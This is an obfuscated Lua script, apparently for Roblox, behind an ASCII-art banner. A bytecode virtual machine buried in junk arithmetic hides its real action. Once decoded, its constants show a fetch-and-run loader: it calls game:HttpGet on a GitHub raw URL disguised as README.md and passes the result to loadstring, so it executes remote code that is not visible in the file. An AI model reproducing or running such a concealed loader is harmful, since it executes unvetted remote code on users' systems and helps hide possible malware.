--[[
                                                                  dP       .8888b                                       dP                                 d8888b. 
                                                                  88       88   "                                       88                                     `88 
88d888b. .d8888b. 88d888b. .d8888b. .d8888b. .d8888b.    .d8888b. 88d888b. 88aaa  dP    dP .d8888b. .d8888b. .d8888b. d8888P .d8888b. 88d888b.    dP   .dP  aaad8' 
88'  `88 88'  `88 88'  `88 Y8ooooo. 88ooood8 88'  `""    88'  `88 88'  `88 88     88    88 Y8ooooo. 88'  `"" 88'  `88   88   88'  `88 88'  `88    88   d8'     `88 
88.  .88 88.  .88 88             88 88.  ... 88.  ...    88.  .88 88.  .88 88     88.  .88       88 88.  ... 88.  .88   88   88.  .88 88          88 .88'      .88 
88Y888P' `88888P8 dP       `88888P' `88888P' `88888P'    `88888P' 88Y8888' dP     `88888P' `88888P' `88888P' `88888P8   dP   `88888P' dP          8888P'   d88888P 
88                                                                                                                                                                 
dP                                                                                                                                                                 
]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (2==v0) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (4==v0) then v13=select;v14=unpack or table.unpack;v15=tonumber;v0=5;end if (v0==3) then v10=getfenv or function()return _ENV;end;v11=setmetatable;v12=pcall;v0=4;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==5) then v16=nil;v16=function(v25,v26,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==6) then v38=nil;v38=function()local v48=1150 -(456 + 694);local v49;local v50;local v51;local v52;local v53;local v54;local v55;while true do if ((2 -0)~=v48) then else v53=nil;v54=nil;v48=6 -3;end if (v48==(549 -(153 + 393))) then v55=nil;while true do local v84=0;while true do if (v84==1) then if (v49==(1462 -(503 + 959))) then v50={};v51={};v52={};v53={v50,v51,nil,v52};v49=1563 -(401 + 1161);end break;end if (0==v84) then if (v49~=(252 -(169 + 81))) then else local v106=0 -0;while true do if (v106~=(1 + 0)) then else for v118=2 -1,v33() do v52[v118]=v33();end return v53;end if (v106~=(1001 -(37 + 964))) then else for v120=1 + 0,v33() do local v121=0;local v122;while true do if (v121==(0 + 0)) then v122=v31();if (v30(v122,1,1)~=(37 -(6 + 31))) then else local v132=0 + 0;local v133;local v134;local v135;local v136;local v137;local v138;while true do if (v132==0) then v133=0;v134=nil;v132=1;end if (v132~=3) then else while true do if (v133==(1938 -(763 + 1173))) then v138=nil;while true do if (v134==(0 -0)) then local v166=0 -0;local v167;while true do if (v166~=(131 -(98 + 33))) then else v167=0;while true do if (v167==(1 + 0)) then v134=1;break;end if (v167~=(0 + 0)) then else v135=1130 -(572 + 558);v136=nil;v167=1539 -(965 + 573);end end break;end end end if ((1 + 1)~=v134) then else while true do if ((1060 -(140 + 920))~=v135) then else local v180=0 -0;local v181;while true do if (0~=v180) then else v181=0 -0;while true do if (v181~=(1619 -(1057 + 562))) then else local v197=0;while true do if (v197~=0) then else v136=v30(v122,1554 -(1367 + 185),3);v137=v30(v122,1 + 3,5 + 1);v197=1;end if (v197==(1 + 0)) then v181=1 + 0;break;end end end if ((4 -3)==v181) then v135=1211 -(858 + 352);break;end end break;end end end if (v135~=1) then else local v182=0;while true do if (v182==(1 + 0)) then v135=1 + 1;break;end if (v182==0) then local v191=1193 -(487 + 706);local v192;while true do if (v191==(0 -0)) then v192=0 + 0;while true do if (v192==1) then v182=1 + 0;break;end if (v192==(0 -0)) then v138={v32(),v32(),nil,nil};if (v136==(0 + 0)) then local v199=0 + 0;local v200;while true do if (v199~=(0 -0)) then else v200=1810 -(1356 + 454);while true do if (v200==(0 + 0)) then v138[3]=v32();v138[4]=v32();break;end end break;end end elseif (v136==(1020 -(459 + 560))) then v138[3]=v33();elseif (v136==(609 -(99 + 508))) then v138[7 -4]=v33() -((1 + 1)^(11 + 5));elseif (v136~=(5 -2)) then else local v209=0;local v210;local v211;while true do if (v209~=1) then else while true do if (v210~=(1805 -(1177 + 628))) then else v211=0;while true do if (v211==(0 -0)) then v138[3]=v33() -(2^(38 -22));v138[4 + 0]=v32();break;end end break;end end break;end if ((0 + 0)~=v209) then else v210=0;v211=nil;v209=1;end end end v192=1 + 0;end end break;end end end end end if (v135~=(3 -0)) then else if (v30(v137,7 -4,7 -4)==(1 -0)) then v138[3 + 1]=v55[v138[4]];end v50[v120]=v138;break;end if (v135==(1900 -(703 + 1195))) then local v184=0 -0;local v185;local v186;while true do if (v184~=(1 + 0)) then else while true do if (v185~=(1218 -(454 + 764))) then else v186=169 -(60 + 109);while true do if (v186==0) then local v198=865 -(777 + 88);while true do if ((1 + 0)==v198) then v186=1 -0;break;end if (v198~=(0 + 0)) then else if (v30(v137,1 + 0,2 -1)==(1 -0)) then v138[2 + 0]=v55[v138[2 + 0]];end if (v30(v137,2 + 0,1467 -(1351 + 114))~=(712 -(168 + 543))) then else v138[1 + 2]=v55[v138[2 + 1]];end v198=1 -0;end end end if ((2 -1)==v186) then v135=1275 -(174 + 1098);break;end end break;end end break;end if (v184==(0 -0)) then v185=874 -(853 + 21);v186=nil;v184=1;end end end end break;end if ((3 -2)==v134) then v137=nil;v138=nil;v134=7 -5;end end break;end if (v133==(1 -0)) then local v161=0 -0;while true do if (v161==1) then v133=380 -(202 + 176);break;end if (v161==(558 -(376 + 182))) then v136=nil;v137=nil;v161=1;end end end if (v133~=(0 -0)) then else local v162=0 -0;while true do if ((0 + 0)~=v162) then else v134=0;v135=nil;v162=1 + 0;end if (v162==(2 -1)) then v133=1091 -(994 + 96);break;end end end end break;end if (v132==(1 -0)) then v135=nil;v136=nil;v132=2;end if (v132==(7 -5)) then v137=nil;v138=nil;v132=1 + 2;end end end break;end end end for v123=771 -(298 + 472),v33() do v51[v123-(1 + 0)]=v38();end v106=1 + 0;end end end if (v49==(1 -0)) then local v107=1155 -(238 + 917);while true do if (v107==(1327 -(208 + 1119))) then v54=v33();v55={};v107=1 + 0;end if (v107~=(1661 -(1396 + 263))) then else v49=2;break;end if (v107==1) then for v125=504 -(496 + 7),v54 do local v126=1306 -(73 + 1233);local v127;local v128;local v129;local v130;while true do if (v126~=1) then else v129=nil;v130=nil;v126=499 -(490 + 7);end if (v126~=2) then else while true do if (v127~=(1 -0)) then else v130=nil;while true do if (v128~=(1 + 0)) then else if (v129==(1909 -(312 + 1596))) then v130=v31()~=(768 -(625 + 143));elseif (v129==(1098 -(281 + 815))) then v130=v34();elseif (v129==3) then v130=v35();end v55[v125]=v130;break;end if (v128==(1972 -(1732 + 240))) then local v160=1115 -(508 + 607);while true do if (v160~=(1 -0)) then else v128=1;break;end if (v160==0) then v129=v31();v130=nil;v160=1;end end end end break;end if (v127~=(614 -(166 + 448))) then else v128=729 -(104 + 625);v129=nil;v127=1 + 0;end end break;end if ((0 + 0)~=v126) then else v127=0 + 0;v128=nil;v126=1 + 0;end end end v53[1092 -(211 + 878)]=v31();v107=7 -5;end end end v84=622 -(5 + 616);end end end break;end if ((55 -(53 + 1))==v48) then v51=nil;v52=nil;v48=2;end if (v48==(0 + 0)) then v49=1457 -(736 + 721);v50=nil;v48=1;end end end;v39=nil;v27=7;end if (v27==5) then v36=v33;v37=nil;v37=function(...)return {...},v13("#",...);end;v27=6;end if (4==v27) then v34=function()local v56=v33();local v57=v33();local v58=(3 -2) + 0;local v59=(v30(v57,1 -0,15 + 5) * (2^(27 + 5))) + v56;local v60=v30(v57,8 + 13,6 + 25);local v61=((v30(v57,(2516 -(826 + 555)) -(965 + 138))==(1 + 0 + 0)) and  -(1 + 0)) or (1 -(0 -0));if (v60==(0 + 0)) then if (v59==(180 -(58 + 122))) then return v61 * (0 -0);else local v85=0 + 0;while true do if (v85==(64 -(4 + 60))) then v60=1 -0;v58=379 -(247 + 132);break;end end end elseif (v60==(6038 -3991)) then return ((v59==(1003 -(817 + 186))) and (v61 * (1/(0 + 0)))) or (v61 * NaN);end return v9(v61,v60-(1966 -943)) * (v58 + (v59/((775 -(578 + 195))^(50 + 2))));end;v35=nil;v35=function(v40)local v62=0 -0;local v63;local v64;while true do if (v62==0) then v63=nil;if  not v40 then v40=v33();if (v40==(1885 -(1796 + 89))) then return "";end end v62=1 -0;end if ((1 + 2)==v62) then return v7(v64);end if (v62==1) then v63=v4(v25,v28,(v28 + v40) -(3 -(986 -(768 + 216))));v28=v28 + v40;v62=1169 -(107 + 1060);end if ((5 -3)==v62) then v64={};for v86=1, #v63 do v64[v86]=v3(v2(v4(v63,v86,v86)));end v62=9 -6;end end end;v27=5;end if (v27==3) then v33=nil;v33=function()local v65,v66,v67,v68=v2(v25,v28,v28 + (6 -3));v28=v28 + (1195 -(653 + 538));return (v68 * (57886299 -41109083)) + (v67 * (56212 + 9324)) + (v66 * (586 -(167 + (453 -290)))) + v65;end;v34=nil;v27=4;end if (v27==7) then v39=function(v41,v42,v43)local v69=0;local v70;local v71;local v72;while true do if (v69==1) then v72=v41[3];return function(...)local v88=0;local v89;local v90;local v91;local v92;local v93;while true do if (v88==3) then A,B=v37(v12(v93));if  not A[1] then local v108=0;local v109;while true do if (0==v108) then v109=v41[4][v89] or "?";error("Script error at ["   .. v109   .. "]:"   .. A[2]);break;end end else return v14(A,2,B);end break;end if (0==v88) then v89=1;v90= -1;v88=1;end if (v88==2) then v93=nil;v93=function()local v96=v70;local v97=v71;local v98=v72;local v99=v37;local v100={};local v101={};local v102={};for v110=0 + 0,v92 do if ((v110>=v98) or ((5676 -(627 + 910))<(757 + 739 + 232))) then v100[v110-v98]=v91[v110 + 1 + 0];else v102[v110]=v91[v110 + (1597 -(1445 + 151))];end end local v103=(v92-v98) + 1 + 0 + 0;local v104;local v105;while true do local v111=1765 -(938 + 827);local v112;while true do if (((2790 + 364 + 728)<3966) and (v111==(1620 -(906 + 714)))) then v112=0 + 0;while true do if (((3128 + (1964 -(946 + 235)))>(1973 + 1806)) and (v112==(2 -(2 -1)))) then if (((4718 -(822 + (1251 -(405 + 707))))>(3343 -(758 + 630))) and (v105<=(2 + 0))) then if ((3849==(5610 -(346 + 1415))) and (v105<=(0 -0))) then local v141=0 -0;local v142;local v143;local v144;local v145;local v146;local v147;while true do if (((676 + (3811 -(51 + 1158)))>(3906 -2238)) and (v141==((622 + 627) -(234 + 834 + 178)))) then while true do if ((v142==(2 + 0)) or ((6033 -2913)==(387 + 2219))) then v147=nil;while true do if ((v143==(6 -4)) or ((3775 -(736 + (2026 -1346)))>=(1107 + 3764))) then for v177=v144,v90 do local v178=0 -0;local v179;while true do if ((v178==(0 + 0)) or ((503 + 636)>=(7077 -5030))) then v179=1313 -(865 + 448);while true do if (((5606 -(609 + 836))>(1857 + 1117)) and (v179==(0 + 0))) then v147=v147 + (4 -3);v102[v177]=v145[v147];break;end end break;end end end break;end if ((v143==(1619 -(1015 + 604))) or ((1415 + 2362)<(252 + 1861))) then local v174=948 -(775 + (1035 -(857 + 5)));while true do if (((1813 -770)<=(2106 -1021)) and (v174==((853 + 516) -(550 + 819)))) then v144=v104[2];v145,v146=v99(v102[v144](v14(v102,v144 + 1 + 0,v104[3 + 0])));v174=1 + 0;end if ((v174==((1353 -(1275 + 77)) + 0)) or (((2847 -1490) -(173 + 137 + 19))>=(3066 -(782 + 889)))) then v143=1 + 0;break;end end end if ((v143==(1 + 0)) or ((5689 -2639)<=((8439 -5156) -2339))) then local v175=0 -0;local v176;while true do if ((v175==(0 + 0)) or ((1140 + 3427)>(8173 -3238))) then v176=194 -(92 + 102);while true do if (((1821 -(496 + 1324))==v176) or ((4944 -3168)<(2888 -(3549 -(538 + 908))))) then v143=(7 + 0) -5;break;end if (((814 + 2454)<(4315 + 204)) and (v176==(949 -(253 + 696)))) then v90=(v146 + v144) -(906 -(257 + 648));v147=328 -(204 + 124);v176=1 + 0;end end break;end end end end break;end if (((2453 -1601)>=(183 + 278)) and (v142==(1 + 0))) then local v165=695 -((1220 -(1056 + 12)) + 543);while true do if ((v165==(1 + 0)) or ((3076 -(216 + 154 + 3))<(432 + 99))) then v142=4 -2;break;end if ((((3528 -(1458 + 44)) + 1423)<=(1636 + 2904)) and (v165==(0 + 0))) then v145=nil;v146=nil;v165=(1052 -(480 + 571)) + 0;end end end if (((1660 + 2042)>=(3845 -(359 + 72))) and (v142==((1752 -(95 + 1657)) -0))) then v143=0 -0;v144=nil;v142=3 -2;end end break;end if ((v141==(1 -0)) or ((12218 -7260)==(390 + 2762))) then v144=nil;v145=nil;v141=5 -(5 -2);end if (((407 + 879)<(1431 + 1096 + 446)) and (v141==(7 -5))) then v146=nil;v147=nil;v141=3;end if (((645 -(210 + 435))==v141) or (4282>(6140 -(609 + 869)))) then v142=(2603 -852) -(1284 + 467);v143=nil;v141=1 + 0;end end elseif (((10414 -5605)>((157 -116) + 109)) and (v105==(1 + 0))) then local v148=(0 -0) + 0;local v149;local v150;while true do if ((v148==(0 + 0)) or ((1336 -(32 + 9 + 693))>(3676 + 1297))) then local v163=0;while true do if ((v163==((653 -474) -(80 + 98))) or ((918 + 1418)>(470 + 1568 + 1560))) then v148=1 + (1838 -(1094 + 744));break;end if ((v163==(589 -(51 + 538))) or ((181 + 995)>=2649)) then v149=0 + 0;v150=nil;v163=1 + 0 + 0;end end end if ((4593==(6816 -2223)) and (v148==(1 + 0))) then while true do if (((51 + 43)<(921 -678)) and (v149==(0 -0))) then v150=v104[1 + 1];v102[v150]=v102[v150](v14(v102,v150 + 1 + (0 -0),v90));break;end end break;end end else local v151=1824 -(1494 + 330);local v152;local v153;local v154;while true do if ((((0 + 0) -0)==v151) or ((4271 -(121 + 307))==(1538 -1225))) then local v164=0 -0;while true do if ((v164==(0 + 0)) or ((3241 + 186 + 56)<=((11991 -8852) -(707 + 725)))) then v152=1629 -(26 + 1603);v153=nil;v164=(1 + 1) -1;end if ((v164==(3 -2)) or (((12367 -(90 + 1651)) -6514)<=((13348 -(1105 + 206)) -(8647 + 229)))) then v151=(7 -4) -2;break;end end end if (((1 + 0)==v151) or ((1482 + 3045)==(4232 -(916 + 573)))) then v154=nil;while true do if (((10280 -5881)<4894) and (v152==(1222 -(706 + 150 + 366)))) then local v170=0;while true do if ((v170==1) or ((1189 + 2916)>=(214 + 4352))) then v152=1 + 0;break;end if ((v170==(0 + 0)) or ((12646 -9976)==(4350 -(1206 + 354)))) then local v187=0 + 0;while true do if (((6408 -3549)>=((102 + 1404) -(50 + 25))) and (v187==(1097 -(862 + 234)))) then v170=1 + 0;break;end if ((v187==(0 -0)) or ((2414 -(50 + 1353))>(3835 -(167 + 39)))) then v153=v104[2 -0];v154=v102[v104[891 -(390 + 498)]];v187=721 -(109 + 32 + 579);end end end end end if (((2500 + 392)>=((1560 -(78 + 1364)) + 2088)) and (v152==(1 + 0))) then v102[v153 + 1 + 0]=v154;v102[v153]=v154[v104[(6 -4) + 2]];break;end end break;end end end elseif ((199==(2155 -(1259 + 697))) and (v105<=(7 -3))) then if (((422 + 1251)<=(4225 -((1479 -951) + 766))) and (v105==(1 + 2))) then v102[v104[(2589 -1514) -(661 + 412)]]=v43[v104[6 -(21 -(6 + 12))]];else do return;end end elseif ((v105>(9 -4)) or ((520 -360)>(3936 -(44 + 449)))) then v102[v104[1 + 0 + 1]]=v104[(159 -(125 + 32)) + 1];else v102[v104[2 + 0]]();end v89=v89 + 1;break;end if ((v112==((1654 -(49 + 1605)) -0)) or ((145 + 60)>1010)) then local v131=0 -0;while true do if (((7509 -4710)>=1784) and (v131==(0 -0))) then v104=v96[v89];v105=v104[1 + (0 -0)];v131=4 -3;end if ((v131==((4503 -3269) -(1031 + 202))) or ((273 + 187)==4742)) then v112=1 + 0;break;end end end end break;end end end end;v88=3;end if (1==v88) then v91={...};v92=v13("#",...) -1;v88=2;end end end;end if (v69==0) then v70=v41[1];v71=v41[2];v69=1;end end end;return v39(v38(),{},v26)(...);end if (v27==0) then v28=1;v29=nil;v25=v5(v4(v25,5),"..",function(v44)if (v2(v44,2)==79) then v29=v1(v4(v44,1,1));return "";else local v77=0;local v78;while true do if (v77==0) then v78=v3(v1(v44,16));if v29 then local v94=0;local v95;while true do if (v94==0) then v95=v6(v78,v29);v29=nil;v94=1;end if (v94==1) then return v95;end end else return v78;end break;end end end end);v27=1;end if (v27==1) then v30=nil;v30=function(v45,v46,v47)if v47 then local v79=(v45/(2^(v46-(1 -0))))%(2^(((v47-((1700 + 121) -(1782 + 38))) -(v46-((1466 + 35) -(467 + 1033)))) + 1 + 0));return v79-(v79%(1 -0));else local v80=(193 -((98 -62) + 155))^(v46-((2157 -(435 + 248)) -(66 + 1407)));return (((v45%(v80 + v80))>=v80) and (1 -0)) or (0 -0);end end;v31=nil;v27=2;end if (v27==2) then v31=function()local v73=0 + 0;local v74;while true do if (v73==(1235 -(893 + 341))) then return v74;end if (v73==((2820 -1681) -(855 + 284))) then v74=v2(v25,v28,v28);v28=v28 + 1;v73=640 -(597 + 42);end end end;v32=nil;v32=function()local v75,v76=v2(v25,v28,v28 + (1282 -(256 + 1024)));v28=v28 + 2;return (v76 * (1770 -(397 + 1117))) + v75;end;v27=3;end end end;v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403513O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6E6577693O7A2F6D696E6961747572652D6F63746F2D73752O636F746173682F6D61696E2F524541444D452E6D6400083O0012033O00013O001203000100023O002002000100010003001206000300046O000100034O00015O00022O00053O000100012O00043O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end end end
